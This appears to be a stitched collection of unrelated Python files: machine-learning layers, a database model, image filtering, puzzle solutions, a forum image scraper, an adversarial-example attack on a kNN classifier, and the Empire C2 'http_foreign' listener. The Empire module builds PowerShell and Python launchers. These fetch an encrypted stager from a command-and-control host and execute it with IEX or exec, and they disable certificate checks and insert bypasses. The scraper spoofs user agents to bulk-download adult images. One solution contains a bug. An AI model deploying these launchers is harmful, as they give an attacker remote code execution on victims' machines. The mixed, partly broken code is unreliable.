LN = tf.multiply(L, 1. / tf.expand_dims(tf.matmul(L[:,:,0], tf.ones([L.shape[1],1])), -1))
entropy_terms = tf.where(LN > 0., -tf.multiply(LN, tf.log(LN)), LN)
return tf.multiply(entropy_terms, 1. / ( 1. + tf.exp( -theta * (.5*(Y-X) - tf.abs(sp - .5*(Y+X))) ) ))
# Vectorizations implementing persistence images
def image_layer(inp, image_size, image_bnds, variance_init, variance_const, train_vect):
""" Persistence Image PersLay """
bp_inp = tf.einsum("ijk,kl->ijl", inp, tf.constant(np.array([[1.,-1.],[0.,1.]], dtype=np.float32)))
dimension_before, num_pts = inp.shape[2].value, inp.shape[1].value
coords = [tf.range(start=image_bnds[i][0], limit=image_bnds[i][1], delta=(image_bnds[i][1] - image_bnds[i][0]) / image_size[i]) for i in range(dimension_before)]
M = tf.meshgrid(*coords)
mu = tf.concat([tf.expand_dims(tens, 0) for tens in M], axis=0)
sg = tf.get_variable("s", shape=[1], initializer=variance_init, trainable=train_vect) if not variance_const else tf.get_variable("s", initializer=variance_init)
bc_inp = tf.reshape(bp_inp, [-1, num_pts, dimension_before] + [1 for _ in range(dimension_before)])
return tf.exp(tf.reduce_sum( -tf.square(bc_inp-mu) / (2*tf.square(sg[0])), axis=2)) / (2*np.pi*tf.square(sg[0]))
def perslay_channel(output, name, diag, **kwargs):
""" PersLay channel for persistence diagrams
output : list on which perslay output will be appended
name : name of the operation for tensorflow
diag : big matrix of shape [N_diag, N_pts_per_diag, dimension_diag (coordinates of points) + 1 (mask--0 or 1)]
"""
try:
train_weight = kwargs["train_weight"]
except KeyError:
train_weight = True
try:
train_vect = kwargs["train_vect"]
except KeyError:
train_vect = True
N, dimension_diag = diag.get_shape()[1], diag.get_shape()[2]
tensor_mask = diag[:, :, dimension_diag - 1]
tensor_diag = diag[:, :, :dimension_diag - 1]
if kwargs["persistence_weight"] == "linear":
with tf.variable_scope(name + "-linear_pweight"):
C = tf.get_variable("C", shape=[1], initializer=kwargs["coeff_init"], trainable=train_weight) if not kwargs["coeff_const"] else tf.get_variable("C", initializer=kwargs["coeff_init"])
weight = C * tf.abs(tensor_diag[:, :, 1:2]-tensor_diag[:, :, 0:1])
if kwargs["persistence_weight"] == "power":
with tf.variable_scope(name + "-power_pweight"):
p = kwargs["power_p"]
C = tf.get_variable("C", shape=[1], initializer=kwargs["coeff_init"], trainable=train_weight) if not kwargs["coeff_const"] else tf.get_variable("C", initializer=kwargs["coeff_init"])
weight = C * tf.pow(tf.abs(tensor_diag[:, :, 1:2]-tensor_diag[:, :, 0:1]), p)
if kwargs["persistence_weight"] == "grid":
with tf.variable_scope(name + "-grid_pweight"):
W = tf.get_variable("W", shape=kwargs["grid_size"], initializer=kwargs["grid_init"], trainable=train_weight) if not kwargs["grid_const"] else tf.get_variable("W", initializer=kwargs["grid_init"])
indices = []
for dim in range(dimension_diag-1):
[m, M] = kwargs["grid_bnds"][dim]
coords = tf.slice(tensor_diag, [0, 0, dim], [-1, -1, 1])
ids = kwargs["grid_size"][dim] * (coords - m)/(M - m)
indices.append(tf.cast(ids, tf.int32))
weight = tf.expand_dims(tf.gather_nd(params=W, indices=tf.concat(indices, axis=2)), -1)
if kwargs["persistence_weight"] == "gmix":
with tf.variable_scope(name + "-gmix_pweight"):
M = tf.get_variable("M", shape=[1,1,2,kwargs["gmix_num"]], initializer=kwargs["gmix_m_init"], trainable=train_weight) if not kwargs["gmix_m_const"] else tf.get_variable("M", initializer=kwargs["gmix_m_init"])
V = tf.get_variable("V", shape=[1,1,2,kwargs["gmix_num"]], initializer=kwargs["gmix_v_init"], trainable=train_weight) if not kwargs["gmix_v_const"] else tf.get_variable("V", initializer=kwargs["gmix_v_init"])
bc_inp = tf.expand_dims(tensor_diag, -1)
weight = tf.expand_dims(tf.reduce_sum(tf.exp(tf.reduce_sum(-tf.multiply(tf.square(bc_inp - M), tf.square(V)), axis=2)), axis=2), -1)
# First layer of channel: processing of the persistence diagrams by vectorization of diagram points
if kwargs["layer"] == "pm": # Channel with permutation equivariant layers
for idx, (dim, pop) in enumerate(kwargs["peq"]):
with tf.variable_scope(name + "-perm_eq-" + str(idx)):
tensor_diag = permutation_equivariant_layer(tensor_diag, dim, pop, kwargs["weight_init"], kwargs["weight_init"], kwargs["bias_init"], kwargs["weight_const"], kwargs["weight_const"], kwargs["bias_const"], train_vect)
elif kwargs["layer"] == "ls": # Channel with landscape layer
with tf.variable_scope(name + "-samples"):
tensor_diag = landscape_layer(tensor_diag, kwargs["num_samples"], kwargs["sample_init"], kwargs["sample_const"], train_vect)
elif kwargs["layer"] == "bc": # Channel with Betti layer
with tf.variable_scope(name + "-samples"):
tensor_diag = betti_layer(tensor_diag, kwargs["theta"], kwargs["num_samples"], kwargs["sample_init"], kwargs["sample_const"], train_vect)
elif kwargs["layer"] == "en": # Channel with entropy layer
with tf.variable_scope(name + "-samples"):
tensor_diag = entropy_layer(tensor_diag, kwargs["theta"], kwargs["num_samples"], kwargs["sample_init"], kwargs["sample_const"], train_vect)
elif kwargs["layer"] == "im": # Channel with image layer
with tf.variable_scope(name + "-bandwidth"):
tensor_diag = image_layer(tensor_diag, kwargs["image_size"], kwargs["image_bnds"], kwargs["variance_init"], kwargs["variance_const"], train_vect)
elif kwargs["layer"] == "ex": # Channel with exponential layer
with tf.variable_scope(name + "-gaussians"):
tensor_diag = exponential_layer(tensor_diag, kwargs["num_elements"], kwargs["mean_init"], kwargs["variance_init"], kwargs["mean_const"], kwargs["variance_const"], train_vect)
elif kwargs["layer"] == "rt": # Channel with rational layer
with tf.variable_scope(name + "-bandwidth"):
tensor_diag = rational_layer(tensor_diag, kwargs["num_elements"], kwargs["mean_init"], kwargs["variance_init"], kwargs["alpha_init"], kwargs["mean_const"], kwargs["variance_const"], kwargs["alpha_const"], train_vect)
elif kwargs["layer"] == "rh": # Channel with rational hat layer
with tf.variable_scope(name + "-bandwidth"):
tensor_diag = rational_hat_layer(tensor_diag, kwargs["num_elements"], kwargs["q"], kwargs["mean_init"], kwargs["r_init"], kwargs["mean_const"], kwargs["r_const"], train_vect)
output_dim = len(tensor_diag.shape) - 2
vector = None # to avoid warning
if output_dim == 1:
# Apply weight and mask
if kwargs["persistence_weight"] is not None:
tiled_weight = tf.tile(weight, [1, 1, tensor_diag.shape[2].value])
tensor_diag = tf.multiply(tensor_diag, tiled_weight)
tiled_mask = tf.tile(tf.expand_dims(tensor_mask, -1), [1, 1, tensor_diag.shape[2].value])
masked_layer = tf.multiply(tensor_diag, tiled_mask)
# Permutation invariant operation
if kwargs["perm_op"] == "topk": # k first values
masked_layer_t = tf.transpose(masked_layer, perm=[0, 2, 1])
values, indices = tf.nn.top_k(masked_layer_t, k=kwargs["keep"])
vector = tf.reshape(values, [-1, kwargs["keep"] * tensor_diag.shape[2].value])
elif kwargs["perm_op"] == "sum": # sum
vector = tf.reduce_sum(masked_layer, axis=1)
elif kwargs["perm_op"] == "max": # maximum
vector = tf.reduce_max(masked_layer, axis=1)
elif kwargs["perm_op"] == "mean": # minimum
vector = tf.reduce_mean(masked_layer, axis=1)
# Second layer of channel: fully-connected (None if fc_layers is set to [], default value)
for idx, tup in enumerate(kwargs["fc_layers"]):
# tup is a tuple whose element are
# 1. dim of fully-connected,
# 2. string for processing,
# 3. (optional) dropout value
with tf.variable_scope(name + "-fc-" + str(idx)):
vector = tf.layers.dense(vector, tup[0])
with tf.variable_scope(name + "-bn-" + str(idx)):
if len(tup) == 2:
vector = _post_processing(vector, tup[1])
else:
vector = _post_processing(vector, tup[1], tup[2])
elif output_dim == 2:
# Apply weight and mask
if kwargs["persistence_weight"] is not None:
weight = tf.expand_dims(weight, -1)
tiled_weight = tf.tile(weight, [1, 1, tensor_diag.shape[2].value, tensor_diag.shape[3].value])
tensor_diag = tf.multiply(tensor_diag, tiled_weight)
tiled_mask = tf.tile(tf.reshape(tensor_mask, [-1, N, 1, 1]), [1, 1, tensor_diag.shape[2].value, tensor_diag.shape[3].value])
masked_layer = tf.multiply(tensor_diag, tiled_mask)
# Permutation invariant operation
if kwargs["perm_op"] == "sum": # sum
vector = tf.reduce_sum(masked_layer, axis=1)
elif kwargs["perm_op"] == "max": # maximum
vector = tf.reduce_max(masked_layer, axis=1)
elif kwargs["perm_op"] == "mean": # minimum
vector = tf.reduce_mean(masked_layer, axis=1)
# Second layer of channel: convolution
vector = tf.expand_dims(vector, -1)
for idx, tup in enumerate(kwargs["cv_layers"]):
# tup is a tuple whose element are
# 1. num of filters,
# 2. kernel size,
# 3. string for postprocessing,
# 4. (optional) dropout value
with tf.variable_scope(name + "-cv-" + str(idx)):
vector = tf.layers.conv2d(vector, filters=tup[0], kernel_size=tup[1])
with tf.variable_scope(name + "-bn-" + str(idx)):
if len(tup) == 3:
vector = _post_processing(vector, tup[2])
else:
vector = _post_processing(vector, tup[2], tup[3])
vector = tf.layers.flatten(vector)
output.append(vector)
return vector
|
nilq/baby-python
|
python
|
from sqlalchemy.dialects.postgresql import UUID
from app.common.sqlalchemy_extensions import utcnow
from database import db
class BaseModel(db.Model):
__abstract__ = True
id = db.Column(
UUID,
primary_key=True,
server_default=db.func.uuid_generate_v4())
created = db.Column(db.DateTime, server_default=utcnow())
last_update = db.Column(
db.DateTime, server_default=utcnow(), onupdate=utcnow())
|
nilq/baby-python
|
python
|
"""
Edge Detection.
A high-pass filter sharpens an image. This program analyzes every
pixel in an image in relation to the neighboring pixels to sharpen
the image.
"""
kernel = [[-1, -1, -1],
[-1, 9, -1],
[-1, -1, -1]]
img = None
def setup():
size(640, 360)
img = loadImage("moon.jpg") # Load the original image
noLoop()
def draw():
image(img, 0, 0) # Displays the image from point (0,0)
img.loadPixels()
# Create an opaque image of the same size as the original
edgeImg = createImage(img.width, img.height, RGB)
# Loop through every pixel in the image.
for y in range(1, img.height - 1): # Skip top and bottom edges
for x in range(1, img.width - 1): # Skip left and right edges
sum = 0 # Kernel sum for this pixel
for ky in range(-1, 2, 1):
for kx in range(-1, 2, 1):
# Calculate the adjacent pixel for this kernel point
pos = (y + ky) * img.width + (x + kx)
# Image is grayscale, red/green/blue are identical
val = red(img.pixels[pos])
# Multiply adjacent pixels based on the kernel values
sum += kernel[ky + 1][kx + 1] * val
# For this pixel in the image, set the gray value
# based on the sum from the kernel
edgeImg.pixels[y * img.width + x] = color(sum, sum, sum)
# State that there are changes to edgeImg.pixels
edgeImg.updatePixels()
image(edgeImg, width / 2, 0) # Draw the image
|
nilq/baby-python
|
python
|
"""
关于dfs,bfs的解释
https://zhuanlan.zhihu.com/p/50187643
"""
class Solution:
def minDepth(self,root):
if not root:
return 0
l = self.minDepth(root.left)
r = self.minDepth(root.right)
return 1 + r + 1 if l == 0 or r == 0 else min(l,r)+1
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# 爬取 春暖花开 论坛帖子中的图片
import os
import fake_useragent
import re
import requests
import time
from bs4 import BeautifulSoup
class Picture:
def all_url(self, url):
"""一个页面有许多图集,而这样的页面有很多,该方法是根据传入的根url,获取所有的页面url"""
list_str = url.split('-')
html = self.request(url)
last = BeautifulSoup(html.text, 'lxml').find('span', id='fd_page_bottom').find('a', class_='last')['href']
max_page = str(last).split('-')[-1].split('.')[0]
for index in range(1, int(max_page) + 1):
new_url = '%s-%s-%d.html' % (list_str[0], list_str[1], index)
print('开始处理页面:%s' % new_url)
self.one_page(new_url)
def one_page(self, url):
"""处理一个页面中的所有图集"""
html = self.request(url)
all_tbody = BeautifulSoup(html.text, 'lxml').find_all('tbody', id=re.compile('(normalthread_)[0-9]+'))
for tbody in all_tbody:
href = tbody.find('td', class_='icn').find('a')['href']
img_url = 'http://%s/%s' % (url.split('/')[2], str(href))
print('开始处理图集:%s' % img_url)
path = str(href).split('-')[1]
self.save_img(img_url, path)
print('当前图集处理完毕')
def save_img(self, url, path):
if self.makedir(path):
html = self.request(url)
all_img = BeautifulSoup(html.text, 'lxml').find_all('img', class_='zoom')
for img in all_img:
try:
img_url = img['file']
except KeyError:
continue
img = self.request(img_url)
if img.status_code != 200:
print('请求失败:%d' % img.status_code)
continue
file_name = str(img_url).split('/')[-1]
with open(file_name, 'ab') as f:
f.write(img.content)
time.sleep(3)
@staticmethod
def makedir(path):
"""创建图集文件夹"""
path = path.strip()
full_path = os.path.join("E:\Image\sex", path)
if not os.path.exists(full_path):
print('建了一个名字叫做', path, '的文件夹!')
os.makedirs(full_path)
# 切换到新建的目录
os.chdir(full_path)
return True
else:
print(path, '文件夹已经存在了!')
return False
@staticmethod
def request(url):
"""请求url并返回响应结果"""
fa = fake_useragent.UserAgent()
headers = {
'User-Agent': fa.random,
}
content = requests.get(url, headers=headers)
return content
if __name__ == '__main__':
p = Picture()
p.all_url('http://qqlive8.space/forum-158-1.html')
|
nilq/baby-python
|
python
|
import logging
import numpy as np
import torch
import torch.optim as optim
INFTY = 1e20
class DKNN_PGD(object):
"""
Implement gradient-based attack on DkNN with L-inf norm constraint.
The loss function is the same as the L-2 attack, but it uses PGD as an
optimizer.
"""
def __init__(self, dknn):
self.dknn = dknn
self.device = dknn.device
self.layers = dknn.layers
self.guide_reps = {}
self.thres = None
self.coeff = None
def __call__(self, x_orig, label, guide_layer, m, epsilon=0.1,
max_epsilon=0.3, max_iterations=1000, num_restart=1,
rand_start=True, thres_steps=100, check_adv_steps=100,
verbose=True):
# make sure we run at least once
if num_restart < 1:
num_restart = 1
# if not using randomized start, no point in doing more than one start
if not rand_start:
num_restart = 1
label = label.cpu().numpy()
batch_size = x_orig.size(0)
min_, max_ = x_orig.min(), x_orig.max()
# initialize adv to the original
x_adv = x_orig.detach()
best_num_nn = np.zeros((batch_size, ))
# set coefficient of guide samples
self.coeff = torch.zeros((x_orig.size(0), m))
self.coeff[:, :m // 2] += 1
self.coeff[:, m // 2:] -= 1
for i in range(num_restart):
# initialize perturbation
delta = torch.zeros_like(x_adv)
if rand_start:
delta.uniform_(- max_epsilon, max_epsilon)
delta.requires_grad_()
for iteration in range(max_iterations):
x = torch.clamp(x_orig + delta, min_, max_)
# adaptively choose threshold and guide samples every
# <thres_steps> iterations
with torch.no_grad():
if iteration % thres_steps == 0:
thres = self.dknn.get_neighbors(x)[0][0][:, -1]
self.thres = torch.tensor(thres).to(self.device).view(
batch_size, 1)
self.find_guide_samples(
x, label, m=m, layer=guide_layer)
reps = self.dknn.get_activations(x, requires_grad=True)
loss = self.loss_function(reps)
loss.backward()
# perform update on delta
with torch.no_grad():
delta -= epsilon * delta.grad.detach().sign()
delta.clamp_(- max_epsilon, max_epsilon)
if (verbose and iteration % (np.ceil(max_iterations / 10)) == 0):
print(' step: %d; loss: %.3f' %
(iteration, loss.cpu().detach().numpy()))
if ((iteration + 1) % check_adv_steps == 0 or
iteration == max_iterations):
with torch.no_grad():
# check if x are adversarial. Only store adversarial
# examples if they have a larger number of wrong
# neighbors than orevious
is_adv, num_nn = self.check_adv(x, label)
for j in range(batch_size):
if is_adv[j] and num_nn[j] > best_num_nn[j]:
x_adv[j] = x[j]
best_num_nn[j] = num_nn[j]
with torch.no_grad():
is_adv, _ = self.check_adv(x_adv, label)
if verbose:
print('number of successful adv: %d/%d' %
(is_adv.sum(), batch_size))
return x_adv
def check_adv(self, x, label):
"""Check if label of <x> predicted by <dknn> matches with <label>"""
output = self.dknn.classify(x)
num_nn = output.max(1)
y_pred = output.argmax(1)
is_adv = (y_pred != label).astype(np.float32)
return is_adv, num_nn
def loss_function(self, reps):
"""Returns the loss averaged over the batch (first dimension of x) and
L-2 norm squared of the perturbation
"""
batch_size = reps[self.layers[0]].size(0)
adv_loss = torch.zeros(
(batch_size, len(self.layers)), device=self.device)
# find squared L-2 distance between original samples and their
# adversarial examples at each layer
for l, layer in enumerate(self.layers):
rep = reps[layer].view(batch_size, 1, -1)
dist = ((rep - self.guide_reps[layer])**2).sum(2)
fx = self.thres - dist
Fx = torch.max(torch.tensor(0., device=self.device),
self.coeff.to(self.device) * fx).sum(1)
adv_loss[:, l] = Fx
return adv_loss.mean()
def find_guide_samples(self, x, label, m=100, layer='relu1'):
"""Find k nearest neighbors to <x> that all have the same class but not
equal to <label>
"""
num_classes = self.dknn.num_classes
x_train = self.dknn.x_train
y_train = self.dknn.y_train
batch_size = x.size(0)
nn = torch.zeros((m, ) + x.size()).transpose(0, 1)
D, I = self.dknn.get_neighbors(
x, k=x_train.size(0), layers=[layer])[0]
for i, (d, ind) in enumerate(zip(D, I)):
mean_dist = np.zeros((num_classes, ))
for j in range(num_classes):
mean_dist[j] = np.mean(
d[np.where(y_train[ind] == j)[0]][:m // 2])
mean_dist[label[i]] += INFTY
nearest_label = mean_dist.argmin()
nn_ind = np.where(y_train[ind] == nearest_label)[0][:m // 2]
nn[i, m // 2:] = x_train[ind[nn_ind]]
nn_ind = np.where(y_train[ind] == label[i])[0][:m // 2]
nn[i, :m // 2] = x_train[ind[nn_ind]]
# initialize self.guide_reps if empty
if not self.guide_reps:
guide_rep = self.dknn.get_activations(
nn[0], requires_grad=False)
for l in self.layers:
# set a zero tensor before filling it
size = (batch_size, ) + guide_rep[l].view(m, -1).size()
self.guide_reps[l] = torch.zeros(size, device=self.device)
# fill self.guide_reps
for i in range(batch_size):
guide_rep = self.dknn.get_activations(
nn[i], requires_grad=False)
self.guide_reps[layer][i] = guide_rep[layer].view(
m, -1).detach()
|
nilq/baby-python
|
python
|
from projecteuler import util
from functools import reduce
from operator import mul
def solution():
"""
The four adjacent digits in the 1000-digit number that have the greatest product are 9 × 9 × 8 × 9 = 5832.
Find the thirteen adjacent digits in the 1000-digit number that have the greatest product.
What is the value of this product?
"""
ans = 0
with open('../data/problem_008_data.txt') as f:
n = [int(x) for x in f.read().replace('\n', '')]
for i in range(len(n)):
tmp = reduce(mul, n[i:i + 13])
if tmp > ans:
ans = tmp
return ans
if __name__ == '__main__':
assert str(solution()) == util.get_answer(8)
|
nilq/baby-python
|
python
|
algo = input('Digite algo: ')
print('O tipo primitivo de algo é', type(algo))
|
nilq/baby-python
|
python
|
from __future__ import print_function
import base64
import random
from builtins import object, str
from textwrap import dedent
from typing import List
from empire.server.common import helpers, packets
from empire.server.utils import data_util, listener_util
class Listener(object):
def __init__(self, mainMenu, params=[]):
self.info = {
"Name": "HTTP[S]",
"Author": ["@harmj0y"],
"Description": ("Starts a 'foreign' http[s] Empire listener."),
"Category": ("client_server"),
"Comments": [],
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
"Name": {
"Description": "Name for the listener.",
"Required": True,
"Value": "http_foreign",
},
"Host": {
"Description": "Hostname/IP for staging.",
"Required": True,
"Value": "http://%s" % (helpers.lhost()),
},
"Port": {
"Description": "Port for the listener.",
"Required": True,
"Value": "",
},
"Launcher": {
"Description": "Launcher string.",
"Required": True,
"Value": "powershell -noP -sta -w 1 -enc ",
},
"StagingKey": {
"Description": "Staging key for initial agent negotiation.",
"Required": True,
"Value": "2c103f2c4ed1e59c0b4e2e01821770fa",
},
"DefaultDelay": {
"Description": "Agent delay/reach back interval (in seconds).",
"Required": True,
"Value": 5,
},
"DefaultJitter": {
"Description": "Jitter in agent reachback interval (0.0-1.0).",
"Required": True,
"Value": 0.0,
},
"DefaultLostLimit": {
"Description": "Number of missed checkins before exiting",
"Required": True,
"Value": 60,
},
"DefaultProfile": {
"Description": "Default communication profile for the agent.",
"Required": True,
"Value": "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
},
"KillDate": {
"Description": "Date for the listener to exit (MM/dd/yyyy).",
"Required": False,
"Value": "",
},
"WorkingHours": {
"Description": "Hours for the agent to operate (09:00-17:00).",
"Required": False,
"Value": "",
},
"SlackURL": {
"Description": "Your Slack Incoming Webhook URL to communicate with your Slack instance.",
"Required": False,
"Value": "",
},
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
self.app = None
self.uris = [
a.strip("/")
for a in self.options["DefaultProfile"]["Value"].split("|")[0].split(",")
]
# set the default staging key to the controller db default
self.options["StagingKey"]["Value"] = str(
data_util.get_config("staging_key")[0]
)
def default_response(self):
"""
If there's a default response expected from the server that the client needs to ignore,
(i.e. a default HTTP page), put the generation here.
"""
return ""
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [
a.strip("/")
for a in self.options["DefaultProfile"]["Value"].split("|")[0].split(",")
]
for key in self.options:
if self.options[key]["Required"] and (
str(self.options[key]["Value"]).strip() == ""
):
print(helpers.color('[!] Option "%s" is required.' % (key)))
return False
return True
def generate_launcher(
self,
encode=True,
obfuscate=False,
obfuscationCommand="",
userAgent="default",
proxy="default",
proxyCreds="default",
stagerRetries="0",
language=None,
safeChecks="",
listenerName=None,
bypasses: List[str] = None,
):
"""
Generate a basic launcher for the specified listener.
"""
bypasses = [] if bypasses is None else bypasses
if not language:
print(
helpers.color(
"[!] listeners/http_foreign generate_launcher(): no language specified!"
)
)
if listenerName and (listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName][
"options"
]
host = listenerOptions["Host"]["Value"]
launcher = listenerOptions["Launcher"]["Value"]
stagingKey = listenerOptions["StagingKey"]["Value"]
profile = listenerOptions["DefaultProfile"]["Value"]
uris = [a for a in profile.split("|")[0].split(",")]
stage0 = random.choice(uris)
customHeaders = profile.split("|")[2:]
if language.startswith("po"):
# PowerShell
stager = '$ErrorActionPreference = "SilentlyContinue";'
if safeChecks.lower() == "true":
stager = "If($PSVersionTable.PSVersion.Major -ge 3){"
for bypass in bypasses:
stager += bypass
stager += "};[System.Net.ServicePointManager]::Expect100Continue=0;"
stager += "$wc=New-Object System.Net.WebClient;"
if userAgent.lower() == "default":
profile = listenerOptions["DefaultProfile"]["Value"]
userAgent = profile.split("|")[1]
stager += f"$u='{ userAgent }';"
if "https" in host:
# allow for self-signed certificates for https connections
stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
if userAgent.lower() != "none" or proxy.lower() != "none":
if userAgent.lower() != "none":
stager += "$wc.Headers.Add('User-Agent',$u);"
if proxy.lower() != "none":
if proxy.lower() == "default":
stager += (
"$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;"
)
else:
# TODO: implement form for other proxy
stager += "$proxy=New-Object Net.WebProxy;"
stager += f"$proxy.Address = '{ proxy.lower() }';"
stager += "$wc.Proxy = $proxy;"
if proxyCreds.lower() == "default":
stager += "$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;"
else:
# TODO: implement form for other proxy credentials
username = proxyCreds.split(":")[0]
password = proxyCreds.split(":")[1]
domain = username.split("\\")[0]
usr = username.split("\\")[1]
stager += f"$netcred = New-Object System.Net.NetworkCredential('{ usr }', '{ password }', '{ domain }');"
stager += f"$wc.Proxy.Credentials = $netcred;"
# TODO: reimplement stager retries?
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(":")[0]
headerValue = header.split(":")[1]
stager += f'$wc.Headers.Add("{ headerKey }","{ headerValue }");'
# code to turn the key string into a byte array
stager += (
f"$K=[System.Text.Encoding]::ASCII.GetBytes('{ stagingKey }');"
)
# this is the minimized RC4 stager code from rc4.ps1
stager += listener_util.powershell_rc4()
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(
stagingKey,
sessionID="00000000",
language="POWERSHELL",
meta="STAGE0",
additional="None",
encData="",
)
b64RoutingPacket = base64.b64encode(routingPacket)
# add the RC4 packet to a cookie
stager += f'$wc.Headers.Add("Cookie","session={ b64RoutingPacket.decode("UTF-8") }");'
stager += f"$ser= { helpers.obfuscate_call_home_address(host) };$t='{ stage0 }';"
stager += "$data=$wc.DownloadData($ser+$t);"
stager += "$iv=$data[0..3];$data=$data[4..$data.length];"
# decode everything and kick it over to IEX to kick off execution
stager += "-join[Char[]](& $R $data ($IV+$K))|IEX"
# Remove comments and make one line
stager = helpers.strip_powershell_comments(stager)
stager = data_util.ps_convert_to_oneliner(stager)
if obfuscate:
stager = data_util.obfuscate(
self.mainMenu.installPath,
stager,
obfuscationCommand=obfuscationCommand,
)
# base64 encode the stager and return it
if encode and (
(not obfuscate) or ("launcher" not in obfuscationCommand.lower())
):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
if language.startswith("py"):
# Python
launcherBase = "import sys;"
if "https" in host:
# monkey patch ssl woohooo
launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n"
try:
if safeChecks.lower() == "true":
launcherBase += listener_util.python_safe_checks()
except Exception as e:
p = "[!] Error setting LittleSnitch in stagger: " + str(e)
print(helpers.color(p, color="red"))
if userAgent.lower() == "default":
profile = listenerOptions["DefaultProfile"]["Value"]
userAgent = profile.split("|")[1]
launcherBase += dedent(
f"""
o=__import__({{2:'urllib2',3:'urllib.request'}}[sys.version_info[0]],fromlist=['build_opener']).build_opener();
UA='{userAgent}';
server='{host}';t='{stage0}';
"""
)
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(
stagingKey,
sessionID="00000000",
language="POWERSHELL",
meta="STAGE0",
additional="None",
encData="",
)
b64RoutingPacket = base64.b64encode(routingPacket).decode("UTF-8")
# add the RC4 packet to a cookie
launcherBase += (
'o.addheaders=[(\'User-Agent\',UA), ("Cookie", "session=%s")];\n'
% (b64RoutingPacket)
)
launcherBase += "import urllib.request;\n"
if proxy.lower() != "none":
if proxy.lower() == "default":
launcherBase += "proxy = urllib.request.ProxyHandler();\n"
else:
proto = proxy.Split(":")[0]
launcherBase += (
"proxy = urllib.request.ProxyHandler({'"
+ proto
+ "':'"
+ proxy
+ "'});\n"
)
if proxyCreds != "none":
if proxyCreds == "default":
launcherBase += "o = urllib.request.build_opener(proxy);\n"
else:
launcherBase += "proxy_auth_handler = urllib.request.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(":")[0]
password = proxyCreds.split(":")[1]
launcherBase += (
"proxy_auth_handler.add_password(None,'"
+ proxy
+ "','"
+ username
+ "','"
+ password
+ "');\n"
)
launcherBase += "o = urllib.request.build_opener(proxy, proxy_auth_handler);\n"
else:
launcherBase += "o = urllib.request.build_opener(proxy);\n"
else:
launcherBase += "o = urllib.request.build_opener();\n"
# install proxy and creds globally, so they can be used with urlopen.
launcherBase += "urllib.request.install_opener(o);\n"
launcherBase += "a=o.open(server+t).read();\n"
# download the stager and extract the IV
launcherBase += listener_util.python_extract_stager(stagingKey)
if encode:
launchEncoded = base64.b64encode(
launcherBase.encode("UTF-8")
).decode("UTF-8")
if isinstance(launchEncoded, bytes):
launchEncoded = launchEncoded.decode("UTF-8")
launcher = (
"echo \"import sys,base64;exec(base64.b64decode('%s'));\" | python3 &"
% (launchEncoded)
)
return launcher
else:
return launcherBase
else:
print(
helpers.color(
"[!] listeners/http_foreign generate_launcher(): invalid language specification: only 'powershell' and 'python' are current supported for this module."
)
)
else:
print(
helpers.color(
"[!] listeners/http_foreign generate_launcher(): invalid listener name specification!"
)
)
def generate_stager(
self,
listenerOptions,
encode=False,
encrypt=True,
obfuscate=False,
obfuscationCommand="",
language=None,
):
"""
If you want to support staging for the listener module, generate_stager must be
implemented to return the stage1 key-negotiation stager code.
"""
print(
helpers.color(
"[!] generate_stager() not implemented for listeners/template"
)
)
return ""
def generate_agent(
self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""
):
"""
If you want to support staging for the listener module, generate_agent must be
implemented to return the actual staged agent code.
"""
print(
helpers.color("[!] generate_agent() not implemented for listeners/template")
)
return ""
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
if language:
if language.lower() == "powershell":
updateServers = """
$Script:ControlServers = @("%s");
$Script:ServerIndex = 0;
""" % (
listenerOptions["Host"]["Value"]
)
getTask = """
$script:GetTask = {
try {
if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) {
# meta 'TASKING_REQUEST' : 4
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
# build the web request object
$wc= New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
$wc.Headers.Add("User-Agent",$script:UserAgent)
$script:Headers.GetEnumerator() | % {$wc.Headers.Add($_.Name, $_.Value)}
$wc.Headers.Add("Cookie", "session=$RoutingCookie")
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$result = $wc.DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI)
$result
}
}
catch [Net.WebException] {
$script:MissedCheckins += 1
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
"""
sendMessage = listener_util.powershell_send_message()
return updateServers + getTask + sendMessage
elif language.lower() == "python":
updateServers = "server = '%s'\n" % (listenerOptions["Host"]["Value"])
# Import sockschain code
f = open(
self.mainMenu.installPath
+ "/data/agent/stagers/common/sockschain.py"
)
socks_import = f.read()
f.close()
sendMessage = listener_util.python_send_message(self.session_cookie)
return socks_import + updateServers + sendMessage
else:
print(
helpers.color(
"[!] listeners/http_foreign generate_comms(): invalid language specification, only 'powershell' and 'python' are current supported for this module."
)
)
else:
print(
helpers.color(
"[!] listeners/http_foreign generate_comms(): no language specified!"
)
)
def start(self, name=""):
"""
Nothing to actually start for a foreign listner.
"""
return True
def shutdown(self, name=""):
"""
Nothing to actually shut down for a foreign listner.
"""
pass
|
